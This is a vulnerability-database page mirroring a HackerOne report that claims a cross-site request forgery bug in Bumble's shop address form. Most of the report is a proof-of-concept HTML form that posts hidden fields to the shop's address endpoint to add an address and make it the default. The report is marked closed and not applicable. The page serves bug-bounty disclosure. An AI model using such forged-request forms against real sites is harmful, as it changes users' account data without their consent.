Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

CSRF bug

B
Bumble
Submitted None
Actions:
View on HackerOne
Reported by dark_heaven

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Sir Recently I found a bug on add address. Check my exploit. It address can be default. I hope you will fix this as soon as possible <html> <body> <form action="https://shop.bumble.com/account/addresses" method="POST"> <input type="hidden" name="form&#95;type" value="customer&#95;address" /> <input type="hidden" name="utf8" value="â&#156;&#147;" /> <input type="hidden" name="address&#91;first&#95;name&#93;" value="Rahamat" /> <input type="hidden" name="address&#91;last&#95;name&#93;" value="Shah" /> <input type="hidden" name="address&#91;company&#93;" value="dark" /> <input type="hidden" name="address&#91;address1&#93;" value="12&#47;45" /> <input type="hidden" name="address&#91;address2&#93;" value="" /> <input type="hidden" name="address&#91;city&#93;" value="newyor" /> <input type="hidden" name="address&#91;country&#93;" value="United&#32;States" /> <input type="hidden" name="address&#91;province&#93;" value="Alabama" /> <input type="hidden" name="address&#91;zip&#93;" value="" /> <input type="hidden" name="address&#91;phone&#93;" value="" /> <input type="hidden" name="address&#91;default&#93;" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Submitted

Weakness

Cross-Site Request Forgery (CSRF)